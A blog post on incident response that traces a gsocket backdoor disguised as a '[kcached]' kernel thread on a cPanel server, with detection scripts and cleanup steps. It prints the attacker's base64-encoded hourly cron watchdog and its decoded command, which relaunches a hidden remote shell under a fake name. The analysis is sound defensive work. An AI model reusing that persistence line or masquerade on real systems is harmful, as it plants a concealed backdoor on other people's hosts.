DEV Community

Henri Sekeladi
How to deal with malicious kcached processes

https://alltime.pp.ua/blog/how-to-deal-with-malicious-kcached-processes/

If you see something like the following on your server, treat it as malicious activity. Genuine kernel threads run as root with kthreadd (PID 2) as their parent and appear in square brackets only because they have no command line of their own. A bracketed name such as `[kcached]` owned by an ordinary hosting account, with one copy parenting another, is a user-space binary that has renamed itself to hide in `ps` output.

```
username 2156075 0.0 0.0 2848 2660 ? Ss Feb09 0:00 [kcached]
username 2156076 0.0 0.0 2852 2660 ? S Feb09 0:01 \_ [kcached]
```

Run `lsof` against the suspicious PID to see which files the process has open. The `txt` entry is the executable actually being run, and `cwd` tells you where it was started from. Note the COMMAND column: `lsof` prints the name the kernel derived from the executable (`gs-dbus`, as in `/proc/PID/comm`), whereas `ps` prints the argv[0] the process chose for itself (`[kcached]`, as in `/proc/PID/cmdline`). A process whose two names disagree is hiding something.

```
root@server1 [~]# lsof -p 2156075
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
gs-dbus 2156075 username cwd DIR 253,1 4096 125184743 /home/username
gs-dbus 2156075 username rtd DIR 253,1 4096 211550638 /
gs-dbus 2156075 username txt REG 253,1 1118516 125174637 /home/username/.config/dbus/gs-dbus
```

Listing the directory `lsof` points at:

```
ls -1 /home/username/.config/dbus/gs-dbus*
/home/username/.config/dbus/gs-dbus*
/home/username/.config/dbus/gs-dbus.dat
```

Don't be misled by the name. `gs-dbus` under `~/.config/dbus` is not a GNOME or D-Bus component; the name and location were chosen so that a quick glance dismisses it as desktop clutter. The `GS_ARGS` variable in the cron payload below and the options it carries (`-k` key file, `-l` listen, `-i` interactive shell, `-q` quiet, `-D` run as a daemon) are the command-line options of gs-netcat from the Global Socket (gsocket) toolkit, which attackers install as a backdoor shell that needs no open inbound port. `gs-dbus` is the renamed gs-netcat binary and `gs-dbus.dat` holds the secret it uses to connect. That both files are owned by the user proves nothing: they were dropped by whoever already controlled the account.
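The name mismatch between `ps` and `lsof` above can be checked systematically. The following POSIX shell script is an added example, not part of the original post, and assumes a Linux `/proc` layout. It flags every process whose own argv[0] starts with `[`: a real kernel thread has an empty `/proc/PID/cmdline` (the brackets in `ps` output are added by `ps` itself), so any process with a non-empty cmdline and a bracketed name set that name deliberately, exactly what `exec -a '[kcached]'` does.

```sh
#!/bin/sh
# Added example (not from the original post): find user-space processes that
# masquerade as kernel threads, reading /proc directly instead of trusting ps.
#
# Facts this relies on (Linux):
#  - a real kernel thread has an EMPTY /proc/PID/cmdline; ps prints its comm
#    in square brackets on its own, the thread never sets a bracketed argv[0]
#  - a user process that shows up as "[name]" therefore chose that name itself
#    (bash's `exec -a`, or by overwriting argv[0]); its cmdline is non-empty
#  - /proc/PID/comm still holds the name derived from the executable, and
#    /proc/PID/exe still points at the binary on disk

# fake_kthread PID: 0 = impostor, 1 = ordinary process or genuine kernel
# thread, 2 = PID has gone away or is not readable.
fake_kthread() {
    pid=$1
    [ -r "/proc/$pid/cmdline" ] || return 2
    argv0=$(tr '\0' '\n' < "/proc/$pid/cmdline" | head -n 1)
    case "$argv0" in
        \[*\]) return 0 ;;   # non-empty cmdline AND a [bracketed] name
        *)     return 1 ;;   # empty (real kthread) or an ordinary name
    esac
}

# describe_pid PID: one line with the fields worth comparing side by side.
describe_pid() {
    pid=$1
    uid=$(awk '/^Uid:/ { print $2 }' "/proc/$pid/status" 2>/dev/null || echo '?')
    comm=$(cat "/proc/$pid/comm" 2>/dev/null || echo '?')
    argv0=$(tr '\0' '\n' 2>/dev/null < "/proc/$pid/cmdline" | head -n 1)
    # readlink needs the same uid (or root); other users' processes show '?'
    exe=$(readlink "/proc/$pid/exe" 2>/dev/null || echo '?')
    printf 'pid=%s uid=%s comm=%s argv0=%s exe=%s\n' \
        "$pid" "$uid" "$comm" "$argv0" "$exe"
}

# scan_fake_kthreads: print every impostor; return 0 if any, 1 if none.
scan_fake_kthreads() {
    found=1
    for dir in /proc/[0-9]*; do
        pid=${dir#/proc/}
        if fake_kthread "$pid"; then
            describe_pid "$pid"
            found=0
        fi
    done
    return $found
}

# Run as root to see the exe path of every user's processes.
scan_fake_kthreads || echo "no impostor kernel threads found"
```

To see it fire, start a decoy the same way the cron payload does, `bash -c 'exec -a "[kcached]" sleep 60' &`, and run the script: the decoy shows up with `comm=sleep argv0=[kcached]` and its real path in `exe`, the same mismatch `lsof` exposed above.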

Inspect the user's crontab:

```
root@server1 [~]# crontab -lu username
# DO NOT REMOVE THIS LINE. SEED PRNG. #gs-dbus-kernel
0 * * * * { echo L3Vzci9iaW4vcGtpbGwgLTAgLVUyNDM4IGdzLWRidXMgMj4vZGV2L251bGwgfHwgU0hFTEw9L3Vzci9sb2NhbC9jcGFuZWwvYmluL25vc2hlbGwgVEVSTT14dGVybS0yNTZjb2xvciBHU19BUkdTPS1rIC9ob21lL3VzZXJuYW1lLy5jb25maWcvZGJ1cy9ncy1kYnVzLmRhdCAtbGlxRCAvdXNyL2Jpbi9iYXNoIC1jIGV4ZWMgLWEgW2tjYWNoZWRdIC9ob21lL3VzZXJuYW1lLy5jb25maWcvZGJ1cy9ncy1kYnVzIDI+L2Rldi9udWxsCg==|base64 -d|bash;} 2>/dev/null #1b5b324a50524e47 >/dev/random # seed prng gs-dbus-kernel
```

Decoding the base64 blob shows what the job does every hour:

```
/usr/bin/pkill -0 -U2438 gs-dbus 2>/dev/null || SHELL=/usr/local/cpanel/bin/noshell TERM=xterm-256color GS_ARGS="-k /home/username/.config/dbus/gs-dbus.dat -liqD" /usr/bin/bash -c "exec -a '[kcached]' '/home/username/.config/dbus/gs-dbus'" 2>/dev/null
```

`pkill -0` sends no signal; it only tests whether a process named `gs-dbus` is already running under uid 2438 (the owning account). If none is found, the `||` branch starts one, using bash's `exec -a` to set argv[0] to `[kcached]` so that the backdoor looks like a kernel thread in `ps`. The cron entry is therefore a watchdog, not a one-off installer: kill the process and it is back within the hour, which is why the cron line has to be removed before anything else. Everything after the first `#` on the cron line (`#1b5b324a50524e47 >/dev/random # seed prng gs-dbus-kernel`) is a shell comment and never executes; the "seed PRNG" story exists only to make the entry look like housekeeping to anyone skimming the crontab.
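Decoding one line by hand is fine once; on a shared host you want to sweep every crontab for the same pattern. The POSIX shell script below is an added example, not part of the original post. It assumes coreutils `base64 -d` and a POSIX `sed`, and embeds the cron line from this page as its sample input. Note that the blob on this page decodes to an unquoted `bash -c exec -a [kcached] /home/username/.config/dbus/gs-dbus`, while real deployments normally carry the quoted form shown above, so the extractor accepts both.

```sh
#!/bin/sh
# Added example (not from the original post): pull base64-wrapped payloads
# out of crontab lines, decode them, and report the process name and binary
# behind an `exec -a NAME BINARY` masquerade (quoted or unquoted form).

# The hourly entry from the post, embedded as constructed sample input.
SAMPLE_CRON_LINE='0 * * * * { echo L3Vzci9iaW4vcGtpbGwgLTAgLVUyNDM4IGdzLWRidXMgMj4vZGV2L251bGwgfHwgU0hFTEw9L3Vzci9sb2NhbC9jcGFuZWwvYmluL25vc2hlbGwgVEVSTT14dGVybS0yNTZjb2xvciBHU19BUkdTPS1rIC9ob21lL3VzZXJuYW1lLy5jb25maWcvZGJ1cy9ncy1kYnVzLmRhdCAtbGlxRCAvdXNyL2Jpbi9iYXNoIC1jIGV4ZWMgLWEgW2tjYWNoZWRdIC9ob21lL3VzZXJuYW1lLy5jb25maWcvZGJ1cy9ncy1kYnVzIDI+L2Rldi9udWxsCg==|base64 -d|bash;} 2>/dev/null #1b5b324a50524e47 >/dev/random # seed prng gs-dbus-kernel'

# decode_cron_line LINE: if LINE pipes a base64 blob into a decoder, print
# the decoded payload and return 0; otherwise print nothing and return 1.
decode_cron_line() {
    case "$1" in
        *"base64 -d"*|*"base64 --decode"*) ;;
        *) return 1 ;;
    esac
    # The blob is the run of base64 characters (16+) right before "|base64";
    # cron's schedule fields guarantee a non-base64 character precedes it.
    b64=$(printf '%s\n' "$1" |
          sed -n 's#.*[^A-Za-z0-9+/=]\([A-Za-z0-9+/=]\{16,\}\) *|[ ]*base64.*#\1#p')
    [ -n "$b64" ] || return 1
    printf '%s' "$b64" | base64 -d
}

# masquerade_name: read a decoded payload on stdin, print the NAME handed to
# `exec -a`, with or without surrounding single quotes.
masquerade_name() {
    sed -n "s#.*exec -a *'*\([^' ]*\)'*.*#\1#p"
}

# masquerade_binary: same, but the program path that follows NAME.
masquerade_binary() {
    sed -n "s#.*exec -a *'*[^' ]*'* *'*\([^' ]*\)'*.*#\1#p"
}

# scan_crontabs FILE...: report every decodable entry in the given crontab
# files (/var/spool/cron/* on RHEL/cPanel, /var/spool/cron/crontabs/* on
# Debian).  Returns 0 if anything was found, 1 otherwise.
scan_crontabs() {
    hits=1
    for f in "$@"; do
        n=0
        while IFS= read -r line || [ -n "$line" ]; do
            n=$((n + 1))
            payload=$(decode_cron_line "$line") || continue
            hits=0
            printf '%s:%s: hidden as %s -> %s\n' "$f" "$n" \
                "$(printf '%s\n' "$payload" | masquerade_name)" \
                "$(printf '%s\n' "$payload" | masquerade_binary)"
            printf '%s:%s: payload: %s\n' "$f" "$n" "$payload"
        done < "$f"
    done
    return $hits
}

# Demo on the embedded sample: the decoded payload and the name it hides behind.
decode_cron_line "$SAMPLE_CRON_LINE"
decode_cron_line "$SAMPLE_CRON_LINE" | masquerade_name
```

On a live host run `scan_crontabs /var/spool/cron/*` as root; the `file:line` prefix tells you exactly which entry to delete with `crontab -e -u USER` before you kill anything.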

Recommendations:

– Don't ignore it; a process that disguises itself as a kernel thread is never legitimate.
– Preserve evidence before cleaning up: copy the binary, the .dat key file and the crontab to a location outside the account, and save the ps and lsof output.
– Remove the cron entry first, then kill both processes (parent and child). In the other order the watchdog relaunches the backdoor within the hour.
– Remove the files under ~/.config/dbus, and look for other files in the account with the same modification time.
– Reset every credential the account has: cPanel login, FTP, mail and database users, plus any API tokens or SSH keys stored in it.
– Find the entry point. SHELL=/usr/local/cpanel/bin/noshell in the payload suggests the account has no shell access, so the attacker obtained code execution some other way: a vulnerable web application, stolen cPanel or FTP credentials, or a web shell in the document root. Check the access logs around the file timestamps.
– Scan the whole account with a malware scanner afterwards; a backdoor of this kind rarely arrives alone.
– Notify the client.
